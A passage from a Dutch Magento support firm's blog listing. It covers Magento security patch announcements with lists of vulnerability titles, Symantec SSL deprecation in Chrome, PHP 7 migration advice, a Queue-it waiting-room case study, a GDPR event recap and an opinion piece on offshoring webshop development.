    Tip 4. Testing. Er zijn honderden smartphones tientallen browsers. Gebruik Google Analytics om inzicht te krijgen in welke apparaten en browsers jouw klanten gebruiken. Een website kan perfect responsive zijn in Safari op de Iphone 7, maar bij de Samsung Galaxy S9 in Chrome toch anders werken. Test meteen ook of de overlay toetsenborden niet voor irritatie zorgen. Wanneer klanten iets willen intypen neemt dit 40% van het beeldscherm in beslag.

    Je content en performance voor je mobiele shop op orde hebben wordt dus steeds meer een must. Voor vragen over Magento 1 of Magento 2 mobile performance en SEO kunt u vrijblijvend contact met ons opnemen.

  • Nieuwe security updates Magento 1 en 2 uitgebracht

    Magento 1 Security Patch (SUPEE-10752 / 1.9.3.9 + 1.14.3.9)

    magento-upgradeMagento heeft op 27 juni een nieuwe patch vrijgegeven, SUPEE-10752. Deze patch biedt een oplossing voor meerdere kritieke beveiligingsproblemen en omvatten de uitvoering van externe code, cross-site scripting en CSRF (Cross-Site Request Forgery). We raden u aan om uw Magento-winkel naar deze nieuwste versie te upgraden. Daarnaast bevat deze patch genaamd Magento Commerce 1.14.3.9 and Open Source 1.9.3.9 een aantal verbeteringen.

    Problemen en verbeteringen:

    • Magento voert niet langer onnodige schrijfbewerkingen uit in de tabel core_url_rewrite.
    • Klanten kunnen zich nu succesvol registreren tijdens het afrekenen zonder onverwacht uitgelogd te worden.
    • Een onjuiste ‘escape’ in het cron.sh-bestand voorkomt niet langer meer dat ‘cron-taken’ parallel lopen zoals verwacht.
    • Nadat een klant zich heeft afgemeld schoont Magento nu de sessiegegevens op zoals verwacht

    De 24 lekken van SUPEE-10752:

    • APPSEC-2001: Authenticated Remote Code Execution (RCE) using custom layout XML
    • APPSEC-2015: Authenticated Remote Code Execution (RCE) through the Create New Order feature (Commerce only)
    • APPSEC-2042: PHP Object Injection and RCE in the Magento admin panel (Commerce Target Rule module)
    • APPSEC-2029: PHP Object Injection and Remote Code Execution (RCE) in the Admin panel (Commerce)
    • APPSEC-2007: Authenticated SQL Injection when saving a category
    • APPSEC-2027: CSRF is possible against Web sites, Stores, and Store Views
    • APPSEC-1882: The cron.php file can leak database credentials
    • APPSEC-2006: Stored cross-site scripting (XSS) through the Enterprise Logging extension
    • APPSEC-2005: Persistent Cross-Site Scripting (XSS) injection in Configuration table
    • APPSEC-1880: Cross-Site Scripting (XSS) through the Admin Username in the CMS Revision Editor (Commerce only)
    • APPSEC-2004: Cross-Site Scripting (XSS) through Remote File Inclusion
    • APPSEC-1988: Path traversal vulnerability in templates
    • APPSEC-1987: Reflective cross-site scripting (XSS) through filter manipulation
    • APPSEC-2034: XSS in Admin Create Order Configure Product Via Compatible File Extensions
    • APPSEC-1876: Cross-site scripting (XSS) in Admin Bundle Product Bundle Items Tab through Product SKU
    • APPSEC-1874: Cross-Site Scripting (XSS) in the Admin Gift Registry Type Edit via Attribute Group
    • APPSEC-1872: Cross-Site Scripting (XSS) in the Admin Manage Catalog Events list through category name
    • APPSEC-1928: Stored XSS in Downloadable Product Links title – frontend
    • APPSEC-1871: Cross-Site Scripting (XSS) in the Admin Manage Customer Rewards points history using the Reason field
    • APPSEC-1870: Cross-Site Scripting (XSS) in Admin Manage Invitations list through Invitee email address
    • APPSEC-1972/APPSEC-2103: Admin password change does not force the logout of the Admin user
    • APPSEC-1934: Systemic Cross-Site Request Forgery (CSRF) on the Checkout page
    • APPSEC-1917: Password theft though uploaded video and Auth Prompt password theft vulnerability
    • APPSEC-1993: IP spoofing

    Wat moet ik doen om Magento Security issues te bestrijden?

    Gebruik altijd de laatste versie van Magento Open Source (1.9.3.9) of Magento Commerce (1.14.3.9) om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.
    Wij helpen u graag hiermee. Mail ons via het supportaanvraagformulier of bel ons op 020-3375906

    Magento 2 Security Release en Update (2.2.5 + 2.1.14)

    Magento heeft op 27 Juni een nieuwe release vrijgegeven, Magento Open Source 2.2.5 en Magento Commerce 2.1.14 Deze release biedt een oplossing voor meerdere kritieke beveiligingsproblemen en omvatten de uitvoering van externe code, cross-site scripting en CSRF (Cross-Site Request Forgery).  Naast deze beveiligingsproblemen zijn er ook een groot aantal andere zaken verbeterd waaronder ruim 150 verbeteringen vanuit de Magento Community. Meer informatie is te vinden op de volgende URL: https://devdocs.magento.com/guides/v2.2/release-notes/ReleaseNotes2.2.5CE.html

    Belangrijk!

    Vanaf Magento 2.2.5 gaat Magento naar een cyclus van 1 minor release per kwartaal. Deze releases omvatten ‘bug fixes’, beveiliging updates, introductie van nieuwe gebundelde extensies en community code extensies. Ze bevatten geen veranderingen die de ‘backwards’ compatibiliteit beïnvloeden, architectuur aanpassingen of ‘Major Changes’. Deze zullen buiten de kwartaal releases tot stand komen.

    We raden u aan om uw Magento-winkel naar deze nieuwste versie te upgraden

    De 16 lekken van Magento Open Source 2.2.5 en Magento Commerce 2.1.14:

    • APPSEC-2014: Authenticated Remote Code Execution (RCE) through the Magento admin panel (swatches module)
    • APPSEC-2054: Remote Code Execution (RCE) via product import
    • APPSEC-2042: PHP Object Injection and RCE in the Magento 2 EE admin panel (Commerce Target Rule module)
    • APPSEC-2055: PHP Object Injection and RCE in the Magento 2 Commerce admin panel (Schedule Import/Export Configuration)
    • APPSEC-2048: SQL Injection through API
    • APPSEC-2025: Arbitrary File Delete via Product Image
    • APPSEC-2044: Cross-Site Scripting (XSS) through B2B quote
    • APPSEC-2026: Authenticated Remote Code Execution (RCE) through the Magento admin panel (currency configuration)
    • APPSEC-2063: Full Page Cache authorization bypass
    • APPSEC-2070: Directory Traversal in Product Import
    • APPSEC-2062: Remote Code Execution (RCE) through dev tools
    • APPSEC-2027: PHP Object Injection and Remote Code Execution (RCE) in the Admin panel (Commerce)
    • APPSEC-2010: Cross-Site Request Forgery + Frontend Stored XSS (Design Configuration)
    • APPSEC-2030: Cross-Site Scripting (XSS) through the Admin Username in the CMS Revision Editor (Commerce only)
    • APPSEC-1716: X-Frame-Options missing from templates
    • APPSEC-1993: IP Spoofing

    Wat moet ik doen om Magento Security issues te bestrijden?

    Gebruik altijd de laatste versie van Magento Open Source (2.2.5) of Magento Commerce (2.1.14) om zo de beveiligingsupdates te krijgen. Wij helpen u graag hiermee. Mail ons via het supportaanvraagformulier of bel ons op 020-3375906

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Symantec SSL certificaten geen ondersteuning van Google Chrome
    sslbadge

    Eind maart maakte Google bekend maatregelen te willen nemen richting Symantec, iets wat veel gevolgen zou kunnen hebben voor de ondersteuning van Symantec SSL certificaten in Google Chrome. Google heeft onlangs hun definitieve voorstel gepresenteerd voor de ondersteuning in Chrome. Kort erna heeft Symantec aangekondigd de volledige SSL certificaten tak te verkopen aan DigiCert.

     

    Het voorstel van Google

    De Symantec SSL certificaten, Thawte en Geotrust worden stapsgewijs niet meer toegestaan, maar de startdatum is hiervoor wel verschoven van 8 augustus 2018 naar april 2019. Dit geeft Magento webwinkeleigenaren dus meer tijd om de certificaten te vervangen. De tijdslijn van Google Chrome ziet er als volgt uit:

    • April 2018 (Chrome versie 66), de Symantec certificaten uitgegeven voor 1 juni 2016 worden niet meer vertrouwd.
    • September 2018 (Chrome versie 70 (gepland)), alle Symantec certificaten uitgegeven onder de huidige PKI infrastructuur worden niet meer vertrouwd.

    Mozilla is de eerste andere browser die heeft aangegeven zich te conformeren aan het voorstel van Google. Naar alle waarschijnlijkheid zullen er meerdere browsers volgen.

    Wat betekent dit voor mijn Magento shop?

    Dit betekent voor Symantec certificaat gebruikers, onder voorbehoud van wijzigingen, dat :

    • Voor april 2018 de certificaten die zijn uitgegeven voor 1 juni 2016, vervangen moeten worden. Dit kan door een heruitgifte van het hetzelfde certificaat, of door over te stappen naar een andere organisatie die certificaten uitgeeft.
    • Voor september 2018 alle Symantec certificaten heruitgegeven moeten worden via een vernieuwde PKI infrastructuur, bijvoorbeeld via DigiCert of een andere organisatie. Dit betekent ook dat de certificaten die nu geldig zijn (en na september 2018), maar wel zijn uitgegeven via Symantec infrastuructuur, alsog vervangen moeten worden.

    DigiCert heeft een artikel geplaatst waarin ze uitleg geven hoe zij deze certificaten gaan vervangen en wat jij daarvoor moet doen. Lees er hier meer over.
    Geen idee of dit van toepassing is op jouw Magento shop? Op de website  van Symantec kun je heel simpel checken of jouw SSL certificaat nog vertrouwd wordt door Google Chrome.

    Hulp nodig met het vervangen van je SSL certificaten op je Magento shop? Neem gerust contact met ons op.

  • Magento Open Source (OS) 2.2.4 release

    magento-upgradeOp 2 mei 2018 is Magento 2.2.4 vrijgegeven met bijna 300 verbeteringen en nieuwe mogelijkheden. Hieronder een overzicht van de belangrijkste aanpassingen.

    Magento 2.2.4 highlights

    • nieuwe 'bundled extensions' die direct en nauwkeurig belasting- en verzendkostenberekeningen toevoegen, direct vanuit de winkelwagen.
      • Amazon Pay biedt een vertrouwde manier voor klanten om in en uit te checken
      • Vertex vereenvoudigt en automatiseert de complexiteit van de berekeningen van de omzetbelastingen
      • Klarna Payments is een nieuwe betaalmethode. Met Klarna Payments kunt u klanten de mogelijkheid bieden om direct te betalen, achteraf te betalen of bij levering van de bestelling.
    • Ook zijn er tal van verbeteringen doorgevoerd in Magento Shipping en Dotmailer. U kunt nu eigen sjablonen maken in Dotmailer voor transactionele emails. De mogelijkheden voor Magento Shipping zijn ook flink uitgebreid.
    • Veel fixes en verbeteringen aan de core, waaronder prestatieverbeteringen voor het laden van afbeeldingen en zoekfuncties, die sneller shoppen mogelijk maken.
    • Bijna 200 bijdrages vanuit de Magento Community.

    Meer informatie over Magento 2.2.4

    Een gedetailleerd overzicht van alle verbeteringen kunt u hier vinden.

    Alhoewel deze update geen specifieke veiligheidslekken dicht t.o.v. Magento 2.2.3, onderschrijven wij Magento's advies om uw software altijd bij te werken. Wij helpen u graag daarbij. Mail ons via het supportaanvraagformulier of bel ons op 020-3375906

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Event:"Impact AVG (GDPR) op Magento shops" was een groot succes

    Op donderdag 12 april organiseerde we samen met Byte een kennissessie over de impact van de AVG (GDPR) op Magento shops. In het mooie kantoor van Byte, vlak naast het Westerpark in Amsterdam, kwamen meer dan 80 webshopeigenaren, managers en developers samen om kennis op te doen over dit interessante onderwerp. De avond werd afgetrapt door Michiel Leij, gastheer en avondvoorzitter van het event. Nadat hij iedereen namens SupportDesk, Byte, Citadel en Buckaroo verwelkomde werd de AVG vanuit verschillende invalshoeken benaderd door de gastsprekers. De onderwerpen die aan bod kwamen waren:

    • De GDPR: Nieuwe Europese privacywet vanaf 25 mei
    • Impact van de AVG op Magento shops
    • AVG & Webhosting
    • AVG & Payment Service Providers
    • AVG & Verzekeringen

    De avond werd afgesloten met discussiepanel en daarna een gezellige borrel. We willen graag iedereen bedanken voor de vele positieve reacties op het event. Kon je niet bij het event zijn maar ben je wel geïnteresseerd in wat er allemaal besproken is? Byte heeft een uitgebreide blog geschreven met alle takeaways over deze geslaagde avond.

    event impact AVG - GDPR op Magento

    De bijdrage van SupportDesk, de presentatie over de impact van de AVG (GDPR) op Magento shops, kun je via deze link nog eens inzien en downloaden.
    Wil je meer weten over de impact van de AVG (GDPR) op Magento shops? Neem dan eens een kijkje in deze blog of neem gerust contact op met een van onze experts.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Queue-it: Why you need a virtual waiting room to complement your Magento ecommerce platform

    queue-it magento SupportDeskRunning an online store is no easy business. During unexpected surges in traffic, just relying on ecommerce software to handle millions of digital customers is not enough. How is the inventory database system handled? Are payments carried out successfully? Are third-party integrations functioning?

    These are some of the dilemmas that ecommerce businesses or consultancies have on a regular basis. Aside from these, from a technical perspective, they also need to integrate all their digital solutions, like customer relationship management systems, personalization extensions or other integrated platforms to seamlessly and simultaneously run their online business.

    During busy campaign days, there are basic expectations, not necessarily related to a specific product sale that also need to be met. For example, keeping webshops online, during high traffic events.

    In the past, many ecommerce and consultancy companies, turned to server scaling when they suffered from outage problems, without really understanding the difference between what server scaling provides and what transactional operations on a website require. Server scaling can work well for static content, such as images on a website, making it run faster and smoother. But it’s a different story if the website depends on transactional functions.

    This is where a virtual waiting room comes in. During campaigns that attract unprecedented online attention, a virtual waiting room will control website traffic peaks and maintain performance at all times, by offloading visitors to an online waiting queue environment, while taking care of all the database bottlenecks.

    How a virtual waiting room improves an ecommerce platform functionality

    SupportDesk, an ecommerce consultancy company that provides professional support for Magento webshops, has integrated a virtual waiting room system with the Magento ecommerce platform, to control website overload during extreme traffic peaks, for one of their retail footwear customers, Patta.

    The need for a virtual waiting room was discovered during one of Patta’s key product launches, that was characterized by a limited stock and enormous popularity. The exclusivity of the released products combined with the social media campaigns and release announcements brought a considerable amount of traffic to their Magento ecommerce platform and their servers.

    As a solution to the overload situation, SupportDesk integrated Queue-it’s virtual waiting room with Patta’s Magento ecommerce platform.

    ’’Although Magento is a highly scalable platform that can handle a substantial amount of transactions, it is bound by the same limitations as any other system based on a relational database. Dynamic page requests such as search, checkout and payment pages rely heavily on database transactions, which have limited capacity and may be difficult or expensive to scale. Furthermore, Magento’s third-party integrations (e.g. payment gateways) have their own limitations that cannot easily be amended.’’

    Martin Pronk, CTO, Queue-it

    With expectations to improve their client’s website performance, SupportDesk came across Queue-it’s virtual waiting room system:

    ’’You need a virtual waiting room when you expect lots of online customers within a short time frame, to prevent a bad performing shop, or worse, a crashing server. A virtual waiting room is functioning like a safety-net controlling the traffic flow.’’

    Sibren Wilkeshuis, Team Manager, SupportDesk

    Magento ecommerce platform & Queue-it virtual waiting room integration

    Not all virtual waiting rooms are created equal. They can vary considerably in what they offer and how they can be implemented. For this reason, it is essential to know what to look for when considering a virtual waiting room provider.

    In Patta’s case, the main area of focus was ease of integration, with no changes to existing systems. SupportDesk implemented Queue-it across the entire website through JavaScript, with a simple link, with no user data placed outside Patta’s existing systems.

    ’We used the virtual waiting room during Patta’s product releases through a JavaScript integration, in front of the whole website. We have seen that a single release runs smoothly and typically with high queue speeds. People buy and go to the checkout. Bigger releases with lots of items (sneakers, shorts, sweaters, caps) create a different shopping behavior. People spend more time browsing all the products in the catalog, which puts more stress on the ecommerce platform.’’

    Sibren Wilkeshuis, Team Manager, SupportDesk

    To make sure that the client’s products ended-up in the hands of real shoppers and to protect their sales against bots and fraudulent activity, SupportDesk turned to Queue-it’s server-side integration. SupportDesk has rewritten the existing Queue-it Magento 2 module to Magento 1. The server-side integration, provided each end-user with a specific queue ID and therefore decreased the likelihood of fraudulent activity or end-users bypassing the queue.

    By integrating the virtual waiting room solution with Magento’s ecommerce platform, SupportDesk helped their client ensure a stable webshop during their product releases, while preserving their ecommerce platform functionality.

    About SupportDesk

    SupportDesk has been one of the leading Magento Support organizations in the Netherlands for over 5 years. With two offices and 25 employees, SupportDesk solves complex Magento 1 and Magento 2 issues for their customers and helps them to optimize their Magento shops. SupportDesk specializes in Magento Security, performance, technical SEO, theming, mobile and migrations while also providing regular training on these topics.

    Learn more about virtual waiting rooms and how ecommerce consultancies and online retailers use them.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • PHP 5.6 of PHP 7? Overstappen naar een nieuwere PHP versie

    PHP 7 and MagentoPHP (PHP: Hypertext preprocessor) is een scripttaal, die bedoeld is om op webservers dynamische webpagina’s te creëren. PHP zorgt er dus voor dat jouw website goed weergegeven en getoond wordt aan je bezoekers.

    PHP 5.6, PHP 7, wat gaat er gebeuren?

    Voor PHP heb je momenteel 2 keuzes; PHP 5.x en PHP 7.x. Voor beide brengt PHP Om de zoveel tijd een nieuwe updates uit. De nieuwste versie van PHP biedt, ten opzichte van zijn voorganger, verschillende verbeteringen aan op het gebied van performance en veiligheid. Echter, met de komst van een nieuwe versie wordt de mate van ondersteuning op de oudere versies steeds minder. Zo zal na verloop van tijd de support op oude versies teruglopen van “Actieve support”, naar enkel “beveiliging support” en daarna zal er geen support meer plaatsvinden. Wij hoeven u natuurlijk niet te vertellen dat een PHP versie die geen beveiligingsupdates meer krijgt een groot beveiligingsrisico met zich meebrengt.

    Wat wordt er van jou verwacht?

    PHP verwacht dus dat je op een gegeven moment migreert naar een nieuwe versie, maar ook hostingpartijen kunnen deze menig delen. Om de veiligheid en prestaties van hun servers te garanderen, ondersteunen sommige hostingpartijen de oude PHP versies niet meer. Zo zal bijvoorbeeld het Hypernode platform van Byte vanaf 1 juni 2018 geen PHP 5.5 meer ondersteunen.
    Magento shops die met PHP 5.5 op een Hypernode van Byte draaien zullen dus in de komende maanden moeten overstappen naar PHP 5.6, PHP 7.0 of PHP 7.1. Maar waar moet je nu naar overstappen?

    Wat is het verschil tussen PHP 5.6 en PHP 7?

    PHP 5.6 is de opvolger van PHP 5.5, alleen is deze net iets sneller, veiliger en wordt door PHP nog ondersteund met beveiligingsupdates. Het verschil tussen deze versies is minimaal en je Magento shop zal over het algemeen even goed, mogelijk beter en in ieder geval veiliger presteren op PHP 5.6.
    PHP 7 is in een aantal opzichten fundamenteel anders dan de PHP 5.x versies. Hierdoor biedt PHP 7 een aantal grote voordelen ten opzichte van zijn voorganger. De volledige lijst aan voordelen kun je terugvinden op de website van PHP, maar de top drie verklappen we je hier al, namelijk;

    • 1. PHP7 is sneller
      • PHP 7 is snel. Heel snel. Door de nieuwe PHP Next Generation Engine worden PHP requests veel sneller verwerkt. Afhankelijk of je FPC gebruikt kan PHP 7 tot wel 3x zo snel werken als PHP 5. Dit maakt je Magento shop dus veel sneller.
    • 2. PHP 7 gebruikt minder geheugen
      • De manier hoe PHP 7 omgaat met het geheugen is grotendeels de sleutel voor de gigantische snelheidsverbeteringen. We zullen je de technische uitleg besparen maar het komt er op neer dat PHP7 bijna 50% minder geheugen gebruikt bij het uitvoeren van scripts. Dit maakt je Magento shop niet alleen een stuk sneller, er kunnen ook meer bezoekers tegelijkertijd je shop bezoeken.
    • 3. Verbeterde foutafhandeling
      • PHP 7 biedt ook een verbeterde foutafhandeling, super handig voor developers en het kan veel tijd besparen bij het programmeren.

    Support van PHP versies

    Zoals net vermeldt ondersteund PHP hun versies niet oneindig. Op een gegeven moment zal een versie de zogenaamde “End of Life” stadium bereiken en is het over het algemeen een slim idee om over te stappen naar een nieuwere versie. Ook deze informatie is verstandig om mee te nemen in je beslissingsoverweging. Hieronder een lijst met de PHP versies en de datum tot welke ze support ontvangen van PHP:

    • 1. PHP 5.5 End of Life (ontvangt geen support meer)
    • 2. PHP 5.6 Security Support tot 1 januari 2019
    • 3. PHP 7.0 Security Support tot 3 december 2018
    • 4. PHP 7.1 Security Support tot 1 december 2019
    • 5. PHP7.2 Security Support tot 30 november 2020

    Zowel PHP 5.6 en PHP 7.0 ontvangen dus grofweg nog een half jaar support. Gezien PHP 5.6 de laatste 5 versie is, zal je dus in 2019 alsnog de overstap moeten maken naar PHP 7.

    PHP 7 voor Magento 1

    Omdat in Magento 2PHP 7 standaard ondersteund wordt focussen we ons nu op Magento 1. Om PHP 7 aan de praat te krijgen in je Magento 1 shop zijn er een aantal dingen waar je rekening mee moet houden. Ten eerste, je Magento versie. Draait je Magento shop nog op een oude versie (ouder dan Magento 1.9.3), dan zal je eerst moeten kijken of je shop wel compatibel is voor PHP 7. Wellicht heb je een nieuwere Magento versie nodig of zijn er extensies die niet compatibel zijn. Ten tweede heb je een compatibillity extension nodig, hiervoor raden wij Inchoo aan.

    Magento 1, PHP 5.6 en PHP 7

    Het komt allemaal neer op het in kaart brengen van de kosten en baten. De overstap van PHP 5.5 naar 5.6 is over het algemeen een kleine stap, zal doorgaans weinig impact hebben op je Magento shop en zal dus minder in de uren lopen. De support zal echter in 2019 ophouden, een nieuwe migratie naar een PHP 7 versie is iets om rekening mee te houden.

    PHP 7. Het is veel sneller, efficiënter en simpelweg gewoon beter dan zijn voorganger. De support voor PHP 7 zal hierdoor nog jaren meegaan. Maar door de fundamentele veranderingen is de overstap vanaf PHP 5.5 wel groter. Je Magento shop en bijbehorende extensies moeten gecheckt worden op compatibiliteit. De migratie naar PHP 7 zal je dus doorgaans meer uren kosten.

    Advies van SupportDesk

    Wij raden altijd een migratie naar PHP 7 aan. De prestatie- en veiligheidsverbeteringen, samen met het feit dat PHP 5.6 in 2019 ook niet meer ondersteund zal worden, maken de overstap naar PHP 7 de meest logische keuze. Vooral op de lange termijn. Test altijd eerst hoe jouw Magento shop werkt voordat je overstapt naar een recentere versie. Wij kunnen je uiteraard helpen met de overstap naar PHP 7.

    Nu kan de overstap naar PHP 7 in de uren lopen en hier wil je natuurlijk niet achteraf pas achter komen. Hiervoor hebben wij de PHP 7 readiness scan voor Magento shops. Met deze scan weet je in een mum van tijd hoe compatibel jouw Magento shop is met PHP 7. Ook krijg je een lijst met onze aanbevelingen voor het overzetten en krijg je een professionele ureninschatting waarin wij denken dat dit gerealiseerd kan worden. Dit voor een fixed price van 250,-. Daarna kunnen wij u natuurlijk ook helpen met de realisatie hiervan. Meer informatie over de PHP 7 readiness scan voor Magento 1 shops kunt u vinden op onze productpagina.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Offshoring is aantrekkelijk, maar is dat het waard?

    foto tabelVolgens het CBS was de online omzet in 2017 19,5 procent hoger dan in 2016. Webwinkels hebben bijna 18 procent meer omgezet door verkoop via internet. De online omzet van winkels waarvan de verkoop via het internet een nevenactiviteit is (multi-channelers) groeide met bijna 22 procent.

    We horen dit soort cijfers vaker maar dit zijn nog steeds indrukwekkende aantallen en groeiend. Door deze getallen sluiten steeds meer ondernemers aan om hun deel mee te pakken in deze groei. Ondernemers die een webwinkel willen beginnen hebben initieel vaak maar een beperkt budget beschikbaar. Vandaag de dag willen we en kan alles goedkoper. Ook geldt dit voor de webshop ontwikkel branche. En waarom zouden we ook meer betalen? Er zijn zat goedkope optie waarmee je een webshop neerzet en achterover kan gaan leunen wachtend op het geld dat binnen gaat stromen, dit is immers wat er belooft wordt door vele partijen. Of toch niet?

    One Stop Shop

    Het is ook wel logisch, een webmarketing, design of kleine webdevelopment bureau wil zich graag breder opstellen om een klant van ‘A tot Z’ te bedienen. De ‘One Stop Shop’ wordt dat ook wel genoemd. Van concept ontwikkeling t/m de nazorg willen ze graag de klant uit handen nemen onder het mom van ‘ontzorgen’. Voor de ondernemer ook wel een fijne gedacht want de mogelijkheden zijn diverse en de techniek heel complex. Veel bureaus hebben echter vaak niet de juiste kennis in huis om dit alles te kunnen. Dat is maar goed ook, ze zijn namelijk erg goed in hun specialisme zoals marketing of concept design. In deze fase werk je nauw samen met de klant om een merkbeleving neer te zetten die de basis moet zijn voor een webshop en je product. Daarna willen ze de klant helpen met het ontwikkelen van hun concept in een werkende webshop. Hier komt namelijk een hoop technisch knowhow bij kijken en kost erg veel tijd ongeacht wat veel leveranciers of SAAS producten je beloven. Denk hierbij aan:

    • Opzetten en configureren van een framewerk,
    • Implementeren van het design,
    • De diensten of product catalogus toevoegen,
    • Alle configuratie en verkoop opties instellen,
    • Voorraad beheer,
    • Betaal mechanisme toevoegen,
    • Waar ga ik hosten,
    • (AdWords) Campagnes, 
    • Search Engine Optimalisatie,
    • Beheer,
    • Beveiliging,
    • testen, testen, testen,
    • etc….

    Kosten bouw webshop

    Om maar even een schot voor de boeg te geven ben je eenmalige minimaal 40k verder voor een kleine shop. Wil je het groots aanpakken moet je rekening houden met 100K plus. Daarnaast heb je, net als bij een gewone winkel, doorlopende kosten voor de huur van je hosting omgeving en het nodige onderhoud en updates van de webshop. Deze zijn ongeveer de helft van de initiële opstartkosten per jaar. Je schrik je rot en denkt, dat moet goedkoper kunnen, en daar springen veel partijen op in door dit werk uit te besteden onder het concept ‘Offshoring’. Dit betekent dat je het werk laat uitvoeren in landen zoals India, Pakistan of de Filipijnen. De uur tarieven liggen daar vele malen lager en de mensen zijn daar ook redelijk tot goed geschoold. Dus waarom ook niet! Voor de beginnende shop ben je nu ineens nog maar 10 tot 15K kwijt voor de initiële opzet. Ruim een derde van de prijs. Je hoeft er ook niet over na te denken want je marketing of concept design bureau regelt dit allemaal voor je. Lekker makkelijk en je krijgt een kant en klare webshop waarmee je gelijk je verwachte verkopen kan realiseren.

    Op papier klinkt dit natuurlijk allemaal heel interessant. De kosten, die door vele al als hoog ervaren worden, worden op deze manier beperkt en de klant maakt het niet uit waar het wordt gemaakt als het er maar werkend staat op de afgesproken tijd. Das de theorie, de praktijk is echter niet altijd zo rooskleurig en zelfs de leveranciers worden met regelmaat verrast van het eindproduct, bagatelliseren het dan en verzetten bergen werk om het alsnog goed te krijgen waarbij een deel van de kosten uiteindelijk wordt doorbelast naar de klant voor een product die suboptimaal is. De leverancier probeert van de fouten te leren om in de toekomst een beter product op te leveren waarbij de kosten uiteindelijk hoger zijn dan ze in eerste instantie waren.

    Ik heb dit soort trajecten al meerdere keren meegemaakt waarbij we soms weer helemaal opnieuw moeten beginnen aangezien het eindproduct op een dusdanige manier is neergezet dat je er bij wijzigingen niets meer mee kan. Een webshop is net zoals een fysieke winkel, onderhevig aan veranderingen. Een etalage verander je ook van tijd tot tijd, de inrichting van de winkel pas je regelmatig aan en je product catalogus is gerelateerd aan markttrends. We maken vaak mee dat op basis van een Framework een shop word neergezet die niet meer kan worden gewijzigd aangezien er vrijwel geen elementen van dit framework op de juiste manier wordt toegepast en er niets meer mee gedaan kan worden anders dan opnieuw te beginnen.

    Nederland vs. Offshoring

    Waarom krijgt de klant dan vaak een webshop waar hij uiteindelijk niet blij van wordt? Er hebben immers geschoolde mensen aan gewerkt die weten wat de techniek inhoud. De techniek is vaak niet het probleem, bij offshoring besteed je iets uit in een land waar cultuur, taal, tijd en begeleiding heel anders is dan bij ons hier in Nederland. De projectteams daar zijn niet betrokken bij het concept, krijgen min of meer een opdracht over de schutting gegooid en gedocumenteerd op papier waarvan wij denken dat dit duidelijk voor ze is. In de offshore landen zitten er ook nog eens lagen tussen die dit weer naar technische taal vertalen en wordt de opdracht overgebracht naar beste weten richting de ontwikkelaars die onder tijdsdruk iets moeten opleveren en geen idee hebben wie die nog kleine startup is in Nederland. Vanzelfsprekend proberen de leveranciers de vinger aan de pols te houden en zijn ze wekelijks of zelfs dagelijks in gesprek waarbij alleen de projectmanagers met elkaar communiceren. Er is weinig beleving van het product op de werkvloer en de ontwikkelaars weten over het algemeen niet wat de klant uiteindelijk wilt met de webshop op de langer termijn. Dat was ook niet de opdracht, ze moeten iets snel en werkend afmaken voor het hier en nu. De hoe en de wat rondom de ideeën en ambities in de toekomst zijn dan niet belangrijk. Tevens werkt men over het algemeen met test data dat onbegrijpelijk is of add-ons zoals payment providers waar men nog nooit van heeft gehoord. Daarnaast hebben we het nog niet gehad over Scoping. Wat voor een bedrijf in Nederland vanzelfsprekend is hoeft niet zo te zijn elders in de wereld. De culturele match is er niet en daarbij de ambitie om iets tot een succes te maken is soms ver te zoeken. We missen een stukje ‘Empathie’ waarbij we met een ‘ons gevoel’ een merkbeleving neerzetten in een webshop

    ‘Empathie’- is inlevingsvermogen, de kunde of vaardigheid om zich in te leven in de situatie en gevoelens van anderen, oftewel kijken door de ogen van de klant.

    Denk dus goed na of offshoring wel de juiste keus is voor jouw webshop. De prijs is in eerste instantie erg aantrekkelijk maar in de praktijk komt dit in veel gevallen hoger uit waarbij de doorloop tijd vrij spel heeft en je niet het gewenste eindproduct krijgt. Frustraties alom, uitstelt van livegang, in gebreke stellen van leveranciers en een hoop stress. Goedkoop wordt uiteindelijk duurkoop!

    Is Offshoring dan wel mogelijk? Natuurlijk zijn er tal van voorbeelden en business cases waar dit wel werkt. Veelal grote bedrijven hebben hier baat bij. Zij hebben doorlopende ontwikkelingen aan hun product groepen en zorgen daarbij voor een nauwe samenwerking tussen de opdrachtgever en de offshoring partij. Ze benutten het gebruik van extra capaciteit die moeilijk te krijgen is of willen niet afwijken van hun core business. Er gaat veel leertijd overheen en er is een onderlinge band met vaste medewerkers die inmiddels alles weten van het product, tevens zijn er veel soorten fail-safes ingebouwd, zijn er duidelijk specs geschreven en zitten er vaak projectmanagers van de opdrachtgever op locatie om alles te overzien. Dus ja het kan ook goed en kosten efficiënt werken.

    Empathie

    Een nieuwe trend is ook om juist meer ‘empathie’ te creëren bij de offshoring partijen doormiddel van het laten overvliegen van ontwikkelaars en deze in Nederland in samenwerking met Project managers aan het product te laten werken. Hierdoor betrek je ze bij het team, de klant en het product. Deze vorm van offshoring brengt echter wel complicaties, je bent immers verantwoordelijk voor de ‘Room en Board’, reiskosten en wet- en regelgeving. Hierdoor is het goedkope uur tarief ineens niet meer zo goedkoop.

    Offshoring werkt dus zeker maar niet voor iedereen en zeker niet voor een startup opzoek naar een quickwin.

    Belangrijke handvatten

    Toch willen we de beginnende webshop een paar handvatten meegeven in het geval er wel wordt gekozen voor Offshoring:

    1. Vraag om referenties en de mogelijkheid om deze persoonlijk te bespreken met ze.
    2. Wees kritisch. Stel veel vragen.
    3. Zorg dat je scope helder is. Liever iets teveel op papier dan te weinig. Denk ook vanuit een Nederlandse gedachte. Wat hier vanzelfsprekend is hoeft dit bij Offshoring vaak niet zo te zijn. Een voorbeeld is dat Webshops in Nederland vrijwel altijd gebruik maken van een iDeal implementatie. Daar houden veel offshoring bedrijven geen rekening mee en beschouwen dit buiten de scope.
